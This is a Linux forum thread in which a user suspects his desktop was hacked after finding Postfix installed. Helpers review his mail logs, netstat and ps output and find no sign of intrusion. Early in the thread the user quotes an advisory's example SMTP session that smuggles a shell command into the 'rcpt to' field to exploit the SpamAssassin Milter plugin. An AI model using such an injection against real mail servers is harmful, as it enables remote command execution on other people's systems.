Postfix is a mail transfer agent (MTA) used for sending email between servers.
Let's see what it has been up to:
Let's see what it has been up to:
Code:
cat /var/log/mail.log
-
While I do that, look at what I found
From here http://www.securityfocus.com/bid/38578/exploitSpamAssassin Milter Plugin 'mlfi_envrcpt()' Remote Arbitrary Command Injection Vulnerability
An attacker can exploit the issue using readily available tools.
The following example commands are available:
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 OkComment
-
Code:cat /var/log/mail.log Oct 9 02:08:19 rafal-desktop postfix/master[8547]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 9 02:09:30 rafal-desktop postfix/master[8547]: terminating on signal 15 Oct 9 02:15:42 rafal-desktop postfix/master[26859]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 9 02:35:58 rafal-desktop postfix/master[1574]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 9 02:36:17 rafal-desktop postfix/master[1574]: reload -- version 2.11.0, configuration /etc/postfix Oct 9 03:38:59 rafal-desktop postfix/master[1594]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 9 03:39:21 rafal-desktop postfix/master[1594]: reload -- version 2.11.0, configuration /etc/postfix Oct 9 15:18:09 rafal-desktop postfix/master[1586]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 9 15:18:51 rafal-desktop postfix/master[1586]: reload -- version 2.11.0, configuration /etc/postfix Oct 9 15:54:36 rafal-desktop postfix/master[1587]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 9 15:55:09 rafal-desktop postfix/master[1587]: reload -- version 2.11.0, configuration /etc/postfix Oct 9 22:05:40 rafal-desktop postfix/master[1585]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 9 22:06:12 rafal-desktop postfix/master[1585]: reload -- version 2.11.0, configuration /etc/postfix Oct 9 22:34:11 rafal-desktop postfix/master[1619]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 9 22:34:34 rafal-desktop postfix/master[1619]: reload -- version 2.11.0, configuration /etc/postfix Oct 10 12:00:29 rafal-desktop postfix/master[1571]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 10 12:00:59 rafal-desktop postfix/master[1571]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 00:38:55 rafal-desktop postfix/master[1585]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 11 00:39:39 rafal-desktop postfix/master[1585]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 00:45:41 rafal-desktop postfix/master[1578]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 11 00:45:59 rafal-desktop postfix/master[1578]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 00:55:23 rafal-desktop postfix/master[1596]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 11 00:55:44 rafal-desktop postfix/master[1596]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 14:16:41 rafal-desktop postfix/master[1563]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 11 14:19:56 rafal-desktop postfix/master[1563]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 19:32:32 rafal-desktop postfix/master[1539]: terminating on signal 15 Oct 11 19:33:18 rafal-desktop postfix/master[1560]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 11 19:33:35 rafal-desktop postfix/master[1560]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 19:33:36 rafal-desktop postfix/master[1560]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 23:45:19 rafal-desktop postfix/master[1560]: terminating on signal 15 Oct 11 23:46:16 rafal-desktop postfix/master[1668]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 11 23:46:35 rafal-desktop postfix/master[1668]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 23:46:35 rafal-desktop postfix/master[1668]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 23:48:17 rafal-desktop postfix/master[1668]: terminating on signal 15 Oct 11 23:49:02 rafal-desktop postfix/master[1563]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 11 23:49:23 rafal-desktop postfix/master[1563]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 23:49:23 rafal-desktop postfix/master[1563]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 23:52:54 rafal-desktop postfix/master[1563]: terminating on signal 15 Oct 11 23:53:59 rafal-desktop postfix/master[1575]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 11 23:54:20 rafal-desktop postfix/master[1575]: reload -- version 2.11.0, configuration /etc/postfix Oct 11 23:54:20 rafal-desktop postfix/master[1575]: reload -- version 2.11.0, configuration /etc/postfix Oct 12 00:11:53 rafal-desktop postfix/pickup[2552]: 80135C0055: uid=1000 from=<rafal> Oct 12 00:11:53 rafal-desktop postfix/cleanup[3864]: 80135C0055: message-id=<20141011221153.80135C0055@rafal-desktop> Oct 12 00:11:53 rafal-desktop postfix/qmgr[2553]: 80135C0055: from=<rafal@rafal-desktop>, size=508, nrcpt=1 (queue active) Oct 12 00:11:53 rafal-desktop postfix/local[3866]: 80135C0055: to=<root@rafal-desktop>, orig_to=<root>, relay=local, delay=0.04, delays=0.02/0.01/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox) Oct 12 00:11:53 rafal-desktop postfix/qmgr[2553]: 80135C0055: removed Oct 12 01:00:02 rafal-desktop postfix/master[1575]: terminating on signal 15 Oct 12 17:06:55 rafal-desktop postfix/master[1589]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 12 17:07:38 rafal-desktop postfix/master[1589]: reload -- version 2.11.0, configuration /etc/postfix Oct 12 17:07:38 rafal-desktop postfix/master[1589]: reload -- version 2.11.0, configuration /etc/postfix Oct 12 18:04:51 rafal-desktop postfix/master[1589]: reload -- version 2.11.0, configuration /etc/postfix Oct 12 18:04:56 rafal-desktop postfix/master[1589]: reload -- version 2.11.0, configuration /etc/postfix Oct 12 18:57:05 rafal-desktop postfix/master[1589]: terminating on signal 15 Oct 12 18:58:05 rafal-desktop postfix/master[1520]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 12 18:58:52 rafal-desktop postfix/master[1520]: reload -- version 2.11.0, configuration /etc/postfix Oct 12 19:45:30 rafal-desktop postfix/master[1520]: terminating on signal 15 Oct 12 21:21:15 rafal-desktop postfix/master[1581]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 12 21:21:37 rafal-desktop postfix/master[1581]: reload -- version 2.11.0, configuration /etc/postfix Oct 12 22:00:11 rafal-desktop postfix/master[1581]: terminating on signal 15 Oct 12 22:00:55 rafal-desktop postfix/master[1558]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 12 22:01:16 rafal-desktop postfix/master[1558]: reload -- version 2.11.0, configuration /etc/postfix Oct 12 22:17:59 rafal-desktop postfix/master[1558]: terminating on signal 15 Oct 12 22:18:44 rafal-desktop postfix/master[1585]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 12 22:19:06 rafal-desktop postfix/master[1585]: reload -- version 2.11.0, configuration /etc/postfix Oct 12 22:32:23 rafal-desktop postfix/master[1585]: terminating on signal 15 Oct 12 22:35:08 rafal-desktop postfix/master[1612]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 12 22:35:34 rafal-desktop postfix/master[1612]: reload -- version 2.11.0, configuration /etc/postfix Oct 12 23:08:46 rafal-desktop postfix/master[1612]: terminating on signal 15 Oct 13 05:03:27 rafal-desktop postfix/master[1628]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 13 05:03:52 rafal-desktop postfix/master[1628]: reload -- version 2.11.0, configuration /etc/postfix Oct 13 05:15:14 rafal-desktop postfix/master[1628]: terminating on signal 15 Oct 13 05:16:15 rafal-desktop postfix/master[1677]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 13 05:16:39 rafal-desktop postfix/master[1677]: reload -- version 2.11.0, configuration /etc/postfix Oct 13 05:19:36 rafal-desktop postfix/master[1677]: terminating on signal 15 Oct 13 05:35:10 rafal-desktop postfix/master[1666]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 13 05:35:30 rafal-desktop postfix/master[1666]: reload -- version 2.11.0, configuration /etc/postfix Oct 13 07:27:24 rafal-desktop postfix/master[1666]: terminating on signal 15 Oct 13 18:36:55 rafal-desktop postfix/master[1635]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 13 18:37:31 rafal-desktop postfix/master[1635]: reload -- version 2.11.0, configuration /etc/postfix Oct 13 18:59:05 rafal-desktop postfix/master[1635]: terminating on signal 15 Oct 13 19:00:04 rafal-desktop postfix/master[1705]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 13 19:00:23 rafal-desktop postfix/master[1705]: reload -- version 2.11.0, configuration /etc/postfix Oct 13 20:13:57 rafal-desktop postfix/master[1705]: terminating on signal 15 Oct 13 20:15:04 rafal-desktop postfix/master[1631]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 13 20:15:21 rafal-desktop postfix/master[1631]: reload -- version 2.11.0, configuration /etc/postfix Oct 13 20:24:41 rafal-desktop postfix/master[1631]: terminating on signal 15 Oct 13 20:44:20 rafal-desktop postfix/master[1666]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 13 20:44:37 rafal-desktop postfix/master[1666]: reload -- version 2.11.0, configuration /etc/postfix Oct 13 20:52:58 rafal-desktop postfix/master[1666]: terminating on signal 15 Oct 13 20:53:58 rafal-desktop postfix/master[1646]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 13 20:54:16 rafal-desktop postfix/master[1646]: reload -- version 2.11.0, configuration /etc/postfix Oct 13 21:04:56 rafal-desktop postfix/master[1646]: terminating on signal 15 Oct 13 21:05:44 rafal-desktop postfix/master[1630]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 13 21:06:01 rafal-desktop postfix/master[1630]: reload -- version 2.11.0, configuration /etc/postfix Oct 13 21:08:15 rafal-desktop postfix/master[1630]: terminating on signal 15 Oct 13 21:09:46 rafal-desktop postfix/master[1628]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 13 21:10:03 rafal-desktop postfix/master[1628]: reload -- version 2.11.0, configuration /etc/postfix Oct 14 00:10:07 rafal-desktop postfix/master[1628]: terminating on signal 15 Oct 14 08:33:30 rafal-desktop postfix/master[1667]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 14 08:34:10 rafal-desktop postfix/master[1667]: reload -- version 2.11.0, configuration /etc/postfix Oct 14 13:42:54 rafal-desktop postfix/master[1623]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 14 13:43:11 rafal-desktop postfix/master[1623]: reload -- version 2.11.0, configuration /etc/postfix Oct 14 14:49:49 rafal-desktop postfix/master[1623]: terminating on signal 15 Oct 14 14:50:49 rafal-desktop postfix/master[1670]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 14 14:51:20 rafal-desktop postfix/master[1670]: reload -- version 2.11.0, configuration /etc/postfix Oct 14 15:40:42 rafal-desktop postfix/master[1670]: terminating on signal 15 Oct 14 15:41:46 rafal-desktop postfix/master[1681]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 14 15:42:12 rafal-desktop postfix/master[1681]: reload -- version 2.11.0, configuration /etc/postfix Oct 14 16:08:56 rafal-desktop postfix/master[1681]: terminating on signal 15 Oct 14 16:12:13 rafal-desktop postfix/master[1651]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 14 16:14:46 rafal-desktop postfix/master[1651]: reload -- version 2.11.0, configuration /etc/postfix Oct 15 03:15:34 rafal-desktop postfix/master[1651]: terminating on signal 15 Oct 15 15:18:05 rafal-desktop postfix/master[1654]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 15 15:18:30 rafal-desktop postfix/master[1654]: reload -- version 2.11.0, configuration /etc/postfix Oct 15 22:49:21 rafal-desktop postfix/master[1654]: terminating on signal 15 Oct 15 22:50:29 rafal-desktop postfix/master[1785]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 15 22:50:57 rafal-desktop postfix/master[1785]: reload -- version 2.11.0, configuration /etc/postfix Oct 16 07:57:31 rafal-desktop postfix/pickup[22837]: C9BB8C3797: uid=0 from=<root> Oct 16 07:57:31 rafal-desktop postfix/cleanup[24838]: C9BB8C3797: message-id=<20141016055731.C9BB8C3797@rafal-desktop> Oct 16 07:57:31 rafal-desktop postfix/qmgr[2513]: C9BB8C3797: from=<root@rafal-desktop>, size=622, nrcpt=1 (queue active) Oct 16 07:57:31 rafal-desktop postfix/local[24841]: C9BB8C3797: to=<root@rafal-desktop>, orig_to=<root>, relay=local, delay=0.12, delays=0.08/0.04/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox) Oct 16 07:57:31 rafal-desktop postfix/qmgr[2513]: C9BB8C3797: removed Oct 16 11:35:33 rafal-desktop postfix/master[1785]: reload -- version 2.11.0, configuration /etc/postfix Oct 16 11:35:38 rafal-desktop postfix/master[1785]: reload -- version 2.11.0, configuration /etc/postfix Oct 16 11:43:07 rafal-desktop postfix/pickup[802]: 58676C3797: uid=1000 from=<rafal> Oct 16 11:43:07 rafal-desktop postfix/cleanup[1272]: 58676C3797: message-id=<20141016094307.58676C3797@rafal-desktop> Oct 16 11:43:07 rafal-desktop postfix/qmgr[801]: 58676C3797: from=<rafal@rafal-desktop>, size=520, nrcpt=1 (queue active) Oct 16 11:43:07 rafal-desktop postfix/local[1274]: 58676C3797: to=<root@rafal-desktop>, orig_to=<root>, relay=local, delay=0.14, delays=0.09/0.04/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox) Oct 16 11:43:07 rafal-desktop postfix/qmgr[801]: 58676C3797: removed Oct 16 11:45:23 rafal-desktop postfix/pickup[802]: 343D4C3797: uid=1000 from=<rafal> Oct 16 11:45:23 rafal-desktop postfix/cleanup[1414]: 343D4C3797: message-id=<20141016094523.343D4C3797@rafal-desktop> Oct 16 11:45:23 rafal-desktop postfix/qmgr[801]: 343D4C3797: from=<rafal@rafal-desktop>, size=506, nrcpt=1 (queue active) Oct 16 11:45:23 rafal-desktop postfix/local[1416]: 343D4C3797: to=<root@rafal-desktop>, orig_to=<root>, relay=local, delay=0.11, delays=0.07/0.03/0/0, dsn=2.0.0, status=sent (delivered to mailbox) Oct 16 11:45:23 rafal-desktop postfix/qmgr[801]: 343D4C3797: removed Oct 16 14:58:42 rafal-desktop postfix/master[1785]: terminating on signal 15 Oct 16 18:32:16 rafal-desktop postfix/master[1591]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 16 18:32:36 rafal-desktop postfix/master[1591]: reload -- version 2.11.0, configuration /etc/postfix Oct 16 18:56:23 rafal-desktop postfix/master[1591]: terminating on signal 15 Oct 16 18:57:16 rafal-desktop postfix/master[1653]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 16 18:57:59 rafal-desktop postfix/master[1653]: reload -- version 2.11.0, configuration /etc/postfix Oct 16 19:21:00 rafal-desktop postfix/master[1653]: terminating on signal 15 Oct 16 19:22:05 rafal-desktop postfix/master[1594]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 16 19:22:33 rafal-desktop postfix/master[1594]: reload -- version 2.11.0, configuration /etc/postfix Oct 16 22:38:39 rafal-desktop postfix/master[1594]: terminating on signal 15 Oct 16 22:39:48 rafal-desktop postfix/master[1606]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 16 22:40:31 rafal-desktop postfix/master[1606]: reload -- version 2.11.0, configuration /etc/postfix Oct 17 01:29:54 rafal-desktop postfix/master[1606]: terminating on signal 15 Oct 17 01:44:11 rafal-desktop postfix/master[1571]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 17 01:44:37 rafal-desktop postfix/master[1571]: reload -- version 2.11.0, configuration /etc/postfix Oct 17 05:31:58 rafal-desktop postfix/master[1571]: terminating on signal 15 Oct 17 12:54:57 rafal-desktop postfix/master[1790]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 17 12:55:32 rafal-desktop postfix/master[1790]: reload -- version 2.11.0, configuration /etc/postfix Oct 17 23:52:47 rafal-desktop postfix/master[1790]: terminating on signal 15 Oct 17 23:53:40 rafal-desktop postfix/master[1521]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 17 23:54:07 rafal-desktop postfix/master[1521]: reload -- version 2.11.0, configuration /etc/postfix Oct 17 23:56:56 rafal-desktop postfix/master[1521]: terminating on signal 15 Oct 17 23:58:03 rafal-desktop postfix/master[1545]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 17 23:58:30 rafal-desktop postfix/master[1545]: reload -- version 2.11.0, configuration /etc/postfix Oct 18 00:02:23 rafal-desktop postfix/master[1545]: terminating on signal 15 Oct 18 00:10:05 rafal-desktop postfix/master[1583]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 18 00:10:32 rafal-desktop postfix/master[1583]: reload -- version 2.11.0, configuration /etc/postfix Oct 18 00:14:01 rafal-desktop postfix/master[1583]: terminating on signal 15 Oct 18 00:15:06 rafal-desktop postfix/master[1647]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 18 00:15:49 rafal-desktop postfix/master[1647]: reload -- version 2.11.0, configuration /etc/postfix Oct 18 00:17:46 rafal-desktop postfix/master[1647]: terminating on signal 15 Oct 18 00:18:33 rafal-desktop postfix/master[1587]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 18 00:19:05 rafal-desktop postfix/master[1587]: reload -- version 2.11.0, configuration /etc/postfix Oct 18 01:35:34 rafal-desktop postfix/master[1587]: terminating on signal 15 Oct 18 15:08:56 rafal-desktop postfix/master[1508]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 18 15:09:23 rafal-desktop postfix/master[1508]: reload -- version 2.11.0, configuration /etc/postfix Oct 19 03:10:06 rafal-desktop postfix/master[1508]: terminating on signal 15 Oct 19 15:23:04 rafal-desktop postfix/master[1569]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 19 15:23:38 rafal-desktop postfix/master[1569]: reload -- version 2.11.0, configuration /etc/postfix Oct 20 00:12:47 rafal-desktop postfix/master[1569]: terminating on signal 15 Oct 20 12:53:31 rafal-desktop postfix/master[1568]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 20 12:54:03 rafal-desktop postfix/master[1568]: reload -- version 2.11.0, configuration /etc/postfix Oct 20 14:23:51 rafal-desktop postfix/master[1568]: terminating on signal 15 Oct 20 14:24:39 rafal-desktop postfix/master[1523]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 20 14:25:00 rafal-desktop postfix/master[1523]: reload -- version 2.11.0, configuration /etc/postfix Oct 20 23:31:30 rafal-desktop postfix/master[1523]: terminating on signal 15 Oct 21 13:38:29 rafal-desktop postfix/master[1593]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 21 13:39:01 rafal-desktop postfix/master[1593]: reload -- version 2.11.0, configuration /etc/postfix Oct 21 17:05:20 rafal-desktop postfix/master[1593]: terminating on signal 15 Oct 21 17:26:26 rafal-desktop postfix/master[1637]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 21 17:27:26 rafal-desktop postfix/master[1637]: reload -- version 2.11.0, configuration /etc/postfix Oct 21 17:27:51 rafal-desktop postfix/master[1637]: terminating on signal 15 Oct 21 17:43:30 rafal-desktop postfix/master[1571]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 21 17:43:48 rafal-desktop postfix/master[1571]: reload -- version 2.11.0, configuration /etc/postfix Oct 21 23:44:57 rafal-desktop postfix/master[1571]: terminating on signal 15 Oct 22 15:38:24 rafal-desktop postfix/master[1563]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 22 15:41:55 rafal-desktop postfix/master[1563]: terminating on signal 15 Oct 22 16:03:56 rafal-desktop postfix/master[1558]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 22 16:04:38 rafal-desktop postfix/master[1558]: reload -- version 2.11.0, configuration /etc/postfix Oct 22 21:39:01 rafal-desktop postfix/master[1558]: terminating on signal 15 Oct 22 21:47:29 rafal-desktop postfix/master[1490]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 22 21:47:50 rafal-desktop postfix/master[1490]: reload -- version 2.11.0, configuration /etc/postfix Oct 22 23:41:06 rafal-desktop postfix/master[1490]: terminating on signal 15 Oct 22 23:41:57 rafal-desktop postfix/master[1572]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 22 23:42:19 rafal-desktop postfix/master[1572]: reload -- version 2.11.0, configuration /etc/postfix Oct 23 00:25:00 rafal-desktop postfix/master[1572]: terminating on signal 15 Oct 23 08:15:14 rafal-desktop postfix/master[1581]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 23 08:15:51 rafal-desktop postfix/master[1581]: reload -- version 2.11.0, configuration /etc/postfix Oct 23 10:04:26 rafal-desktop postfix/master[1581]: terminating on signal 15 Oct 23 17:46:16 rafal-desktop postfix/master[1516]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 23 17:52:31 rafal-desktop postfix/master[1516]: reload -- version 2.11.0, configuration /etc/postfix Oct 24 02:43:31 rafal-desktop postfix/master[1516]: reload -- version 2.11.0, configuration /etc/postfix Oct 24 02:44:48 rafal-desktop postfix/master[1516]: terminating on signal 15 Oct 24 02:45:36 rafal-desktop postfix/master[1586]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 24 02:47:31 rafal-desktop postfix/master[1586]: reload -- version 2.11.0, configuration /etc/postfix Oct 24 05:44:34 rafal-desktop postfix/master[1586]: terminating on signal 15 Oct 24 05:45:25 rafal-desktop postfix/master[1522]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 24 05:46:14 rafal-desktop postfix/master[1522]: reload -- version 2.11.0, configuration /etc/postfix Oct 24 09:05:06 rafal-desktop postfix/master[1522]: terminating on signal 15 Oct 24 09:05:52 rafal-desktop postfix/master[1585]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 24 09:06:33 rafal-desktop postfix/master[1585]: reload -- version 2.11.0, configuration /etc/postfix Oct 24 12:13:56 rafal-desktop postfix/master[1585]: terminating on signal 15 Oct 24 21:23:36 rafal-desktop postfix/master[1576]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 24 21:24:01 rafal-desktop postfix/master[1576]: reload -- version 2.11.0, configuration /etc/postfix Oct 24 21:29:59 rafal-desktop postfix/master[1576]: terminating on signal 15 Oct 24 23:02:16 rafal-desktop postfix/master[1569]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 24 23:02:36 rafal-desktop postfix/master[1569]: reload -- version 2.11.0, configuration /etc/postfix Oct 24 23:59:54 rafal-desktop postfix/master[1569]: terminating on signal 15 Oct 25 16:44:49 rafal-desktop postfix/master[1605]: daemon started -- version 2.11.0, configuration /etc/postfix Oct 25 16:45:51 rafal-desktop postfix/master[1605]: reload -- version 2.11.0, configuration /etc/postfix Oct 25 16:48:33 rafal-desktop postfix/smtpd[3245]: connect from localhost[127.0.0.1] Oct 25 17:00:19 rafal-desktop postfix/smtpd[3245]: timeout after UNKNOWN from localhost[127.0.0.1] Oct 25 17:00:19 rafal-desktop postfix/smtpd[3245]: disconnect from localhost[127.0.0.1] Oct 25 17:16:37 rafal-desktop postfix/master[1605]: terminating on signal 15
Comment
-
I uninstalled postfix and this is current netstat -l
Code:Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 rafal-desktop:domain *:* LISTEN tcp 0 0 localhost:ipp *:* LISTEN tcp6 0 0 ip6-localhost:ipp [::]:* LISTEN udp 0 0 *:37027 *:* udp 0 0 *:mdns *:* udp 0 0 rafal-desktop:domain *:* udp 0 0 *:ipp *:* udp6 0 0 [::]:mdns [::]:* udp6 0 0 [::]:55549 [::]:*
Comment
-
Right, you said servers, I am using a desktopOriginally posted by Feathers McGraw View Post
Comment
-
This is what I found in /tmpComment
-
There's nothing in that mail.log that suggests any email has been sent out from your computer, which is what I was looking for. The only two messages in there seem to be from root to root, probably three "three wrong sudo password attempts" emails.
In short, you have nothing to worry about. Do you remember installing postfix? When you uninstalled it, did you get any messages about dependencies? I'm wondering if it was pulled in by something else you installed.Comment
-
I have never installed postfix. When uninstalled, no dependencies popped up. I use the --no-install-recommends switch when installing something now, but I am worried, I am unable to install any other distro, always get a KVM disabled message, it is as if this person / persons only want me to use *buntu so they can exploit it. Not to mention my ISP switched our router this year to one of the most security.....think cheese full of holes, the Technicolor TC7200, and I am not allowed to bridge with this router/modem, it is a *hybrid* 2 in 1.Last edited by raffytaffy; Oct 25, 2014, 10:02 AM.Comment
-
I use Kubuntu as my server OS. The only differences between a "desktop" and a "server" is the programs that are installed and the fact that a server is typically always on.Originally posted by johndoe View PostRight, you said servers, I am using a desktop
BTW your attachment link is broken.Comment
-
You must have done, because it is not installed by default!Originally posted by johndoe View PostComment
-
I do not have sshd installed in synaptic, yet this. Also there is a /tmp/ssh agent file present. Someone is running openssh server on my rig it seems, but well hidden. I am at a loss.
Code:rafal@rafal-desktop:~$ service sshd status sshd: unrecognized service
Code:rafal@rafal-desktop:~$ ps aux | grep sshd rafal 4142 0.0 0.0 12972 2356 pts/0 S+ 18:32 0:00 grep --color=auto sshd
Comment
-
Dude, that's not SSHD, it's grep matching itself, which is searching for sshd (sshd is an argument you passed to grep...).
Observe:
For the record, the United Nations has not broken into my flat and installed some super secret software on my computer. Here's what you would have got if SSHD was actually running:Code:feathers-mcgraw@Hobbs-T440s:~$ ps aux | grep sshd feather+ 3251 0.0 0.0 12164 2104 pts/0 S+ 17:39 0:00 grep --color=auto sshd feathers-mcgraw@Hobbs-T440s:~$ ps aux | grep foo feather+ 3253 0.0 0.0 12164 2204 pts/0 S+ 17:39 0:00 grep --color=auto foo feathers-mcgraw@Hobbs-T440s:~$ ps aux | grep bananas feather+ 3256 0.0 0.0 12164 2072 pts/0 S+ 17:40 0:00 grep --color=auto bananas feathers-mcgraw@Hobbs-T440s:~$ ps aux | grep newworldorder feather+ 3259 0.0 0.0 12164 2100 pts/0 S+ 17:40 0:00 grep --color=auto newworldorder
I think you need to slow down a bit, you seem to have overwhelmed yourself with information, and confirmation bias is leading you to believe that someone has "hacked" you. It's extremely unlikely, and none of the information you have provided supports that theory.Code:sam@samhobbs:~$ ps aux | grep sshd root 1223 0.0 0.0 61364 3064 ? Ss Oct20 0:00 /usr/sbin/sshd -D root 2096 0.0 0.0 111844 4312 ? Ss 17:43 0:00 sshd: sam [priv] sam 2186 0.0 0.0 111844 1892 ? S 17:43 0:00 sshd: sam@pts/2 sam 2217 0.0 0.0 11752 900 pts/2 S+ 17:43 0:00 grep --color=auto sshd
BTW, you still haven't answered my question about what you said in your first post:
Where's the evidence for this?Originally posted by johndoe View PostComment
-
I ran netstat -a a few days back as I was looking at ways to see who is connecting to my computer. I saw the output, and used network tools to see where the IPs originated that were connected. A lot were from Middle East. I just don't know what to do :/ I don't mean to offend anyone, just stating what I saw.
This was VERY long, computers and servers. So I started going through the IPs to see where they were coming from.Code:netstat -a Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 rafal-desktop:domain *:* LISTEN tcp 0 0 localhost:ipp *:* LISTEN tcp 0 0 192.168.0.35:49379 li240-5.members.li:http ESTABLISHED tcp 0 0 192.168.0.35:33340 74.125.71.95:https ESTABLISHED tcp 0 0 192.168.0.35:44059 fra07s30-in-f22.1:https ESTABLISHED tcp 0 0 192.168.0.35:37490 46.28.247.103:https ESTABLISHED tcp 0 0 192.168.0.35:40808 46.28.247.88:https TIME_WAIT tcp 0 0 192.168.0.35:49376 li240-5.members.li:http ESTABLISHED tcp 0 0 192.168.0.35:49825 46.28.247.109:https ESTABLISHED tcp 0 0 192.168.0.35:50524 46.28.247.98:https TIME_WAIT tcp 0 0 192.168.0.35:40810 46.28.247.88:https TIME_WAIT tcp 0 0 192.168.0.35:49380 li240-5.members.li:http TIME_WAIT tcp 0 0 192.168.0.35:49378 li240-5.members.li:http ESTABLISHED tcp 0 0 192.168.0.35:49377 li240-5.members.li:http ESTABLISHED tcp 0 0 192.168.0.35:44458 li203-141.members:https ESTABLISHED tcp 0 0 192.168.0.35:52105 192.0.80.241:https ESTABLISHED tcp6 0 0 ip6-localhost:ipp [::]:* LISTEN tcp6 1 0 ip6-localhost:36936 ip6-localhost:ipp CLOSE_WAIT udp 0 0 *:mdns *:* udp 0 0 *:40210 *:* udp 0 0 rafal-desktop:domain *:* udp 0 0 *:ipp *:* udp6 0 0 [::]:45283 [::]:* udp6 0 0 [::]:mdns [::]:*
Last edited by raffytaffy; Oct 25, 2014, 11:08 AM.Comment
-
No offence, but until you can provide me with the actual evidence that supported your conclusion, I'm going to assume you misinterpreted what you saw, like you misinterpreted the output from netstat -l and ps aux you have posted.
Making an effort to learn about your computer is a really good thing, just slow down and try not to jump to so many wild conclusions.Comment
-
Also, since I think it might be good for you to be shown that you did install postfix, please run these two commands:
Code:cat /var/log/apt/history.log | grep -C 5 postfix
This searches for postfix in each one of your log files for apt (the package management utility) and returns 5 lines either side of any matches.Code:for log in /var/log/apt/history.log.* ; do echo $log && zcat $log | grep -C 5 postfix ; done
I got this:
